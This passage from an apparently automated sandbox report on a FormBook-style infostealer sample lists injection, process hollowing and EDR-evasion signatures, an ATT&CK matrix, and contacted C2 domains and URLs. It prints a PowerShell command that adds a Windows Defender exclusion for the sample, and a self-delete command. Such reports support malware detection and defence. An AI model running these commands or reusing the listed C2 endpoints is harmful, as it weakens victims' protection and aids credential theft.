            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00F639FE FormatMessageW,ConvertLengthToIpv4Mask,InetNtopW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,LocalFree,LocalAlloc,GetAdaptersAddresses,LocalFree,9_2_00F639FE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00F653F0 SetUnhandledExceptionFilter,9_2_00F653F0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00F651A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00F651A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeNetwork Connect: 85.13.166.18 80Jump to behavior
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe"
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe"Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeNtQueueApcThread: Indirect: 0x196A4F2Jump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeNtClose: Indirect: 0x196A56C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeNtClose: Indirect: 0x389A56C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeNtQueueApcThread: Indirect: 0x389A4F2Jump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeThread register set: target process: 4084Jump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeThread register set: target process: 4084Jump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 4084Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
            Sample uses process hollowing technique
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: F60000Jump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe"Jump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess created: C:\Users\user\Desktop\JHnNxt6Pnb.exe "C:\Users\user\Desktop\JHnNxt6Pnb.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\JHnNxt6Pnb.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00F64ACA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,9_2_00F64ACA
            Source: explorer.exe, 00000006.00000002.4002815172.00000000044D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1543667021.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4000726033.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000006.00000002.4000242416.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1543269548.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1543667021.0000000001091000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000006.00000000.1543667021.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4000726033.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
            Source: explorer.exe, 00000006.00000000.1543667021.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4000726033.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000006.00000003.3076284044.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005528609.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657201257.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd]1Q
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeQueries volume information: C:\Users\user\Desktop\JHnNxt6Pnb.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00F626AE GetSystemTimeAsFileTime,9_2_00F626AE
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.JHnNxt6Pnb.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.JHnNxt6Pnb.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Shared Modules            		1
            DLL Side-Loading            		512
            Process Injection            		1
            Rootkit            		1
            Credential API Hooking            		1
            System Time Discovery            		Remote Services1
            Credential API Hooking            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		1
            Masquerading            		LSASS Memory231
            Security Software Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		2
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		11
            Disable or Modify Tools            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook141
            Virtualization/Sandbox Evasion            		NTDS141
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture12
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script512
            Process Injection            		LSA Secrets1
            Application Window Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information            		Cached Domain Credentials1
            System Network Configuration Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Abuse Elevation Control Mechanism            		DCSync1
            File and Directory Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job4
            Obfuscated Files or Information            		Proc Filesystem213
            System Information Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
            Software Packing            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            DLL Side-Loading            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569252 Sample: JHnNxt6Pnb.exe Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 39 www.68716329.xyz 2->39 41 www.yzq0n.top 2->41 43 9 other IPs or domains 2->43 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 55 11 other signatures 2->55 11 JHnNxt6Pnb.exe 4 2->11         started        signatures3 53 Performs DNS queries to domains with low reputation 39->53 process4 file5 37 C:\Users\user\AppData\...\JHnNxt6Pnb.exe.log, ASCII 11->37 dropped 61 Adds a directory exclusion to Windows Defender 11->61 63 Tries to detect virtualization through RDTSC time measurements 11->63 65 Switches to a custom stack to bypass stack traces 11->65 15 JHnNxt6Pnb.exe 11->15         started        18 powershell.exe 23 11->18         started        signatures6 process7 signatures8 75 Modifies the context of a thread in another process (thread injection) 15->75 77 Maps a DLL or memory area into another process 15->77 79 Sample uses process hollowing technique 15->79 83 2 other signatures 15->83 20 explorer.exe 80 1 15->20 injected 81 Loading BitLocker PowerShell Module 18->81 24 WmiPrvSE.exe 18->24         started        26 conhost.exe 18->26         started        process9 dnsIp10 45 www.irex.info 85.13.166.18, 49716, 80 NMM-ASD-02742FriedersdorfHauptstrasse68DE Germany 20->45 57 System process connects to network (likely due to code injection or exploit) 20->57 59 Uses ipconfig to lookup or modify the Windows network settings 20->59 28 ipconfig.exe 20->28         started        31 autoconv.exe 20->31         started        signatures11 process12 signatures13 67 Modifies the context of a thread in another process (thread injection) 28->67 69 Reads the DNS cache 28->69 71 Maps a DLL or memory area into another process 28->71 73 2 other signatures 28->73 33 cmd.exe 1 28->33         started        process14 process15 35 conhost.exe 33->35         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            JHnNxt6Pnb.exe68%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
            JHnNxt6Pnb.exe100%AviraTR/AD.Swotter.yyerx
            JHnNxt6Pnb.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.yzq0n.top0%Avira URL Cloudsafe
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%Avira URL Cloudsafe
            http://www.5mwhs.top/cu29/www.layman.vip0%Avira URL Cloudsafe
            http://www.apita.top0%Avira URL Cloudsafe
            http://www.68716329.xyzReferer:0%Avira URL Cloudsafe
            http://www.oldsteps.buzz0%Avira URL Cloudsafe
            http://www.apita.topReferer:0%Avira URL Cloudsafe
            http://www.siabgc4d.online/cu29/0%Avira URL Cloudsafe
            http://www.leachlondonstore.online/cu29/0%Avira URL Cloudsafe
            http://www.inn-paaaa.buzz/cu29/www.irex.info0%Avira URL Cloudsafe
            http://www.leachlondonstore.onlineReferer:0%Avira URL Cloudsafe
            http://www.microsoft.c0%Avira URL Cloudsafe
            http://www.irex.info0%Avira URL Cloudsafe
            http://www.inn-paaaa.buzz/cu29/0%Avira URL Cloudsafe
            http://www.layman.vipReferer:0%Avira URL Cloudsafe
            http://www.48372305.top0%Avira URL Cloudsafe
            http://www.srtio.xyz/cu29/www.leachlondonstore.online0%Avira URL Cloudsafe
            http://www.layman.vip/cu29/www.nd-los.net0%Avira URL Cloudsafe
            http://www.siabgc4d.online/cu29/www.48372305.top0%Avira URL Cloudsafe
            http://www.apita.top/cu29/0%Avira URL Cloudsafe
            http://www.layman.vip/cu29/0%Avira URL Cloudsafe
            http://www.inn-paaaa.buzzReferer:0%Avira URL Cloudsafe
            http://www.azino-forum-pro.online/cu29/0%Avira URL Cloudsafe
            https://android.notify.windows.com/iOS0%Avira URL Cloudsafe
            http://www.azino-forum-pro.onlineReferer:0%Avira URL Cloudsafe
            http://www.68716329.xyz/cu29/www.apita.top0%Avira URL Cloudsafe
            http://www.oldsteps.buzzReferer:0%Avira URL Cloudsafe
            http://www.layman.vip0%Avira URL Cloudsafe
            http://www.azino-forum-pro.online/cu29/www.68716329.xyz0%Avira URL Cloudsafe
            http://www.yzq0n.top/cu29/www.siabgc4d.online0%Avira URL Cloudsafe
            http://www.irex.info/cu29/www.yzq0n.top0%Avira URL Cloudsafe
            http://schemas.micro0%Avira URL Cloudsafe
            http://www.nd-los.net/cu29/me0%Avira URL Cloudsafe
            http://www.leachlondonstore.online0%Avira URL Cloudsafe
            http://www.68716329.xyz/cu29/0%Avira URL Cloudsafe
            http://www.leachlondonstore.online/cu29/www.5mwhs.top0%Avira URL Cloudsafe
            http://www.siabgc4d.onlineReferer:0%Avira URL Cloudsafe
            http://www.azino-forum-pro.online0%Avira URL Cloudsafe
            http://www.irex.infoReferer:0%Avira URL Cloudsafe
            http://www.apita.top/cu29/www.oldsteps.buzz0%Avira URL Cloudsafe
            http://www.siabgc4d.online0%Avira URL Cloudsafe
            http://www.48372305.top/cu29/www.77179ksuhr.top0%Avira URL Cloudsafe
            http://www.5mwhs.top0%Avira URL Cloudsafe
            http://www.68716329.xyz0%Avira URL Cloudsafe
            http://www.oldsteps.buzz/cu29/www.srtio.xyz0%Avira URL Cloudsafe
            http://www.irex.info/cu29/0%Avira URL Cloudsafe
            http://www.77179ksuhr.topReferer:0%Avira URL Cloudsafe
            http://www.48372305.top/cu29/0%Avira URL Cloudsafe
            http://www.77179ksuhr.top/cu29/0%Avira URL Cloudsafe
            http://www.yzq0n.topReferer:0%Avira URL Cloudsafe
            http://www.f6b-crxy.top/cu29/www.azino-forum-pro.online0%Avira URL Cloudsafe
            http://www.77179ksuhr.top/cu29/www.f6b-crxy.top0%Avira URL Cloudsafe
            http://www.irex.info/cu29/?MvvxBDN=IwPUjMyQOkFzpF8yWccrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZOM4azueTiHl&Bjk=7nwDmBCH2DD0oHhP0%Avira URL Cloudsafe
            http://www.inn-paaaa.buzz0%Avira URL Cloudsafe
            http://www.5mwhs.top/cu29/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.irex.info
            		85.13.166.18
            		truetrue
              		unknown
              www.oldsteps.buzz
              		unknown
              		unknowntrue
                		unknown
                www.f6b-crxy.top
                		unknown
                		unknowntrue
                  		unknown
                  www.inn-paaaa.buzz
                  		unknown
                  		unknowntrue
                    		unknown
                    www.azino-forum-pro.online
                    		unknown
                    		unknowntrue
                      		unknown
                      www.68716329.xyz
                      		unknown
                      		unknowntrue
                        		unknown
                        www.siabgc4d.online
                        		unknown
                        		unknowntrue
                          		unknown
                          www.48372305.top
                          		unknown
                          		unknowntrue
                            		unknown
                            www.77179ksuhr.top
                            		unknown
                            		unknowntrue
                              		unknown
                              www.apita.top
                              		unknown
                              		unknowntrue
                                		unknown
                                www.yzq0n.top
                                		unknown
                                		unknowntrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  www.f6b-crxy.top/cu29/false
                                    		high
                                    http://www.irex.info/cu29/?MvvxBDN=IwPUjMyQOkFzpF8yWccrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZOM4azueTiHl&Bjk=7nwDmBCH2DD0oHhPtrue
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://powerpoint.office.comerexplorer.exe, 00000006.00000002.4008024188.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1554749905.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.siabgc4d.online/cu29/explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://android.notify.windows.com/iOSA4explorer.exe, 00000006.00000000.1554749905.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
